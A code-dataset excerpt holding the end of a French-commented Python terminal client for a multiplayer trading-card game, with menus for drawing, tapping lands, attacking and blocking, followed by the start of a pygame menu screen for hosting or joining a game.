player.get_board().get_land_zone():\n\t\t\t\t\t\t\n\t\t\t\t\t\tif(card.is_tapped()):\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint(\"[(T)\" + card._name, end=\"] \")\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint(\"[\" + card._name, end=\"] \")\n\n\t\t\t\t\tprint()\n\n\t\t\t\t\tfor card in player.get_board().get_battle_zone():\n\n\t\t\t\t\t\tif(card.is_sick()):\n\n\t\t\t\t\t\t\tif(card.is_tapped()):\n\n\t\t\t\t\t\t\t\tprint(\"[(S)(T)\" + card._name, end=\"] \")\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint(\"[(S)\" + card._name, end=\"] \")\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif(card.is_tapped()):\n\n\t\t\t\t\t\t\t\tprint(\"[(T)\" + card._name, end=\"] \")\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint(\"[\" + card._name, end=\"] \")\n\n\t\t\t\t\tprint()\n\n\t\t\t\tinput(\">\")\n\n\t\t\telif(user_input == MULLIGAN):\n\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"MULLIGAN\"\n\t\t\t\t}\n\n\t\t\t\tbreak\n\n\t\t\telif(user_input == DRAW_CARD):\n\t\t\t\t\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"DRAW_CARD\"\n\t\t\t\t}\n\n\t\t\t\tbreak\n\n\t\t\telif(user_input == TAP_LAND):\n\n\t\t\t\tif(self.__players[self.__player_id].landzone_size() > 0):\n\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage de nos cartes terrain\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_land_zone():\n\n\t\t\t\t\t\t\tif(card.is_tapped()):\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint(\"(T)\" + card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].landzone_size()-1)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].landzone_size()):\n\n\t\t\t\t\t\t\t\tidentity = self.__players[self.__player_id].get_board().get_land_zone()[user_input].get_identity()\n\n\t\t\t\t\t\t\t\trequest = { \n\t\t\t\t\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\t\t\t\t\"type\" : \"TAP_LAND\",\n\t\t\t\t\t\t\t\t\t\"landzone_position\" : user_input,\n\t\t\t\t\t\t\t\t\t\"color\" : \"\"\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\t\t\tif(len(identity) == 1):\n\n\t\t\t\t\t\t\t\t\trequest[\"color\"] = identity[0]\n\n\t\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t# TODO : Ajouter la gestion des mana double via un menu de selection (compliqué)\n\t\t\t\t\t\t\t\t\t\tfor color in identity:\n\n\t\t\t\t\t\t\t\t\t\t\tprint(color + \" (\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\t\t\t\ti += 1\n\n\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,len(identity)-1)\n\n\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(identity)):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"color\"] = identity[user_input]\n\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tbreak\n\n\t\t\telif(user_input == PLAY_CARD):\n\n\t\t\t\tif(self.__players[self.__player_id].hand_size() > 0):\n\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_hand():\n\n\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].hand_size()-1)\t\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].hand_size()):\t\t\t\n\n\t\t\t\t\t\t\t\trequest = { \n\t\t\t\t\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\t\t\t\t\"type\" : \"PLAY_CARD\",\n\t\t\t\t\t\t\t\t\t\"hand_position\" : user_input\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\tbreak\n\n\t\t\telif(user_input == USE_EFFECT):\n\n\t\t\t\tprint(\"y'a r\")\n\t\t\t\t\n\t\t\telif(user_input == SELECT):\n\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"SELECT\",\n\t\t\t\t\t\"selections\" : []\n\t\t\t\t}\n\n\t\t\t\tselecting = True\n\n\t\t\t\twhile selecting:\n\n\t\t\t\t\t# Choix du joueur\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage des joueurs\n\t\t\t\t\t\tfor player in self.__players:\n\n\t\t\t\t\t\t\tprint(f\"PLAYER {player.get_id()} ({i})\")\n\n\t\t\t\t\t\t\ti = i + 1 \n\t\t\t\t\t\tprint(f\"STOP ({i})\")\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,i)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input == i):\n\n\t\t\t\t\t\t\t\tselecting = False\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\telif(user_input >= 0 and user_input < len(self.__players)):\n\n\t\t\t\t\t\t\t\trequest[\"selections\"].append([])\n\n\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t# Choix de la zone\n\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t# Affichage des zones\n\t\t\t\t\t\t\t\t\tprint(\"PLAYER (0)\")\n\t\t\t\t\t\t\t\t\tprint(\"DECK (1)\")\n\t\t\t\t\t\t\t\t\tprint(\"HAND (2)\")\n\t\t\t\t\t\t\t\t\tprint(\"BATTLE_ZONE (3)\")\n\t\t\t\t\t\t\t\t\tprint(\"LAND_ZONE (4)\")\n\t\t\t\t\t\t\t\t\tprint(\"GRAVEYARD (5)\")\n\t\t\t\t\t\t\t\t\tprint(\"EXILE (6)\")\n\n\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\tuser_input = self.input(0,6)\n\n\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\tif(user_input == SELECTION_PLAYER):\n\n\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"PLAYER\")\n\n\t\t\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_DECK):\n\n\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"DECK\")\n\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_HAND):\n\n\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"HAND\")\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification que l'on soit le joueur concerné et qu'on possède des cartes\n\t\t\t\t\t\t\t\t\t\t\tif(request[\"selections\"][-1][TARGET_ID] == self.__player_id and self.__players[self.__player_id].hand_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_hand():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].hand_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].hand_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_BATTLEZONE):\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification qu'il y ait des cartes dans la zone\n\t\t\t\t\t\t\t\t\t\t\tif(self.__players[self.__player_id].battlezone_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"BATTLE_ZONE\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_battle_zone():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].battlezone_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].battlezone_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_LANDZONE):\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification qu'il y ait des cartes dans la zone\n\t\t\t\t\t\t\t\t\t\t\tif(self.__players[self.__player_id].landzone_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"LAND_ZONE\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_land_zone():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].landzone_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].landzone_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_GRAVEYARD):\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification qu'il y ait des cartes dans la zone\n\t\t\t\t\t\t\t\t\t\t\tif(self.__players[self.__player_id].graveyard_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"GRAVEYARD\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_graveyard():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].graveyard_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].graveyard_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_EXILE):\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification qu'il y ait des cartes dans la zone\n\t\t\t\t\t\t\t\t\t\t\tif(self.__players[self.__player_id].exile_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"EXILE\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_exile():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,exile_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].exile_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\tbreak\n\n\t\t\telif(user_input == ATTACK):\n\n\t\t\t\tif(self.__players[self.__player_id].battlezone_size() > 0):\n\n\t\t\t\t\t# Sélection du joueur\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage de la liste des joueurs\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor player in self.__players:\n\n\t\t\t\t\t\t\tprint(\"[ Player \" + str(player.get_id()) + \" ]\")\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,len(self.__players)-1)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players)):\n\n\t\t\t\t\t\t\t\trequest = { \n\t\t\t\t\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\t\t\t\t\"type\" : \"ATTACK\",\n\t\t\t\t\t\t\t\t\t\"target\" : user_input,\n\t\t\t\t\t\t\t\t\t\"attacker\" : -1\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t# Sélection de la carte attaquante\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage des cartes sur notre Battle Zone\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_battle_zone():\n\n\t\t\t\t\t\t\tif(card.is_sick()):\n\n\t\t\t\t\t\t\t\tif(card.is_tapped()):\n\n\t\t\t\t\t\t\t\t\tprint(\"(S)(T)\" + card.get_name() + \"(\" + str(i) + \")\")\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tprint(\"(S)\" + card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\tif(card.is_tapped()):\n\n\t\t\t\t\t\t\t\t\tprint(\"(T)\" + card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].battlezone_size()-1)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players[self.__player_id].get_board().get_battle_zone())):\n\n\t\t\t\t\t\t\t\trequest[\"attacker\"] = user_input\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\telif(user_input == BLOCK):\n\n\t\t\t\tif(self.__players[self.__player_id].battlezone_size() > 0):\n\n\t\t\t\t\t# Sélection du joueur\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage de la liste des joueurs\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor player in self.__players:\n\n\t\t\t\t\t\t\tprint(\"[ Player \" + str(player.get_id()) + \" ]\")\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,len(self.__players)-1)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players)):\n\n\t\t\t\t\t\t\t\trequest = { \n\t\t\t\t\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\t\t\t\t\"type\" : \"BLOCK\",\n\t\t\t\t\t\t\t\t\t\"target\" : user_input,\n\t\t\t\t\t\t\t\t\t\"ennemy_attacker\" : -1,\n\t\t\t\t\t\t\t\t\t\"blocker\" : -1\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif(self.__players[user_input].battlezone_size() > 0):\n\n\t\t\t\t\t\t# Sélection de la carte ennemie à bloquer\n\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t# Affichage de la Battle Zone ennemie\n\t\t\t\t\t\t\tprint(\"Joueur\", request[\"target\"], \"(\" + str(self.__players[request[\"target\"]].get_life()) + \")\")\n\t\t\t\t\t\t\tfor card in self.__players[request[\"target\"]].get_board().get_battle_zone():\n\n\t\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[request[\"target\"]].battlezone_size()-1)\n\n\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players[request[\"target\"]].get_board().get_battle_zone())):\n\n\t\t\t\t\t\t\t\t\trequest[\"ennemy_attacker\"] = user_input\n\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\n\t\t\t\t\t\t# Sélection de la carte bloquante\n\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t# Affichage de notre Battle Zone\n\t\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_battle_zone():\n\n\t\t\t\t\t\t\t\tif(card.is_tapped()):\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tprint(\"(T)\" + card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].battlezone_size()-1)\n\n\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players[self.__player_id].get_board().get_battle_zone())):\n\n\t\t\t\t\t\t\t\t\trequest[\"blocker\"] = user_input\n\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\tbreak\n\n\t\t\telif(user_input == SKIP_PHASE):\n\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"SKIP_PHASE\"\n\t\t\t\t}\n\n\t\t\t\tbreak\n\n\t\t\telif(user_input == CONCEDE):\n\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"CONCEDE\"\n\t\t\t\t}\n\n\t\t\t\tbreak\t\t\t\t\n\n\t\t\telse:\n\n\t\t\t\tinput(\"Erreur lors de la saisie, appuyez sur Entrée pour revenir au menu\")\n\n\t\t#input(request)\n\n\t\treturn request\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint ('Interrupted')\n\t\tsys.exit(0)","sub_path":"code/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":26644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"361115630","text":"# Written by Laurenz Mädje\r\n\r\nimport pygame\r\nimport math\r\nimport os\r\nimport sys\r\nimport time\r\nimport threading\r\nimport socket\r\nimport cards\r\nimport player\r\nimport var\r\nimport net\r\n\r\n\r\nclass Menu:\r\n\r\n def __init__(self):\r\n\r\n var.hintergrund = pygame.image.load('res/background.jpg')\r\n var.hintergrund = pygame.transform.scale(var.hintergrund, (1366, 768))\r\n\r\n # Start UI Elemente\r\n self.buttonServer = Button((588, 350, 190, 58), 'Server')\r\n self.port = Label((518, 250, 100, 40), 'Port: ')\r\n self.portfield = TextField((638, 240, 160, 53))\r\n\r\n self.buttonClient = Button((588, 600, 190, 58), 'Client')\r\n self.port2 = Label((228, 500, 100, 40), 'Port: ')\r\n self.portfield2 = TextField((328, 490, 160, 53))\r\n self.host = Label((528, 500, 100, 40), 'Host: ')\r\n self.hostfield = TextField((638, 490, 500, 53))\r\n\r\n self.textbox = Textbox((103, 100, 1200, 100), 'Gib einen Port ein und wähle Server, um einen Server zu starten und auf einen Gegner zu warten! '\r\n 'newline Gib Port und IP eines Hosts ein und wähle Client, um dich mit dessen Server zu verinden!', 25)\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\r\n pygame.quit()\r\n os._exit(0)\r\n\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n return\r\n\r\n self.portfield.update(event)\r\n self.portfield2.update(event)\r\n self.hostfield.update(event)\r\n\r\n if self.buttonServer.update(event):\r\n var.type = 'server'\r\n var.connection = ('', self.portfield.getText())\r\n return\r\n\r\n elif self.buttonClient.update(event):\r\n var.type = 'client'\r\n var.connection = (self.hostfield.getText(), self.portfield2.getText())\r\n return\r\n\r\n var.screen.blit(var.hintergrund, (0,0))\r\n\r\n self.buttonServer.draw()\r\n self.portfield.draw()\r\n self.port.draw()\r\n self.buttonClient.draw()\r\n self.portfield2.draw()\r\n self.port2.draw()\r\n self.host.draw()\r\n self.hostfield.draw()\r\n self.textbox.draw()\r\n\r\n pygame.display.update()\r\n\r\n\r\nclass WaitScreen():\r\n\r\n def __init__(self):\r\n 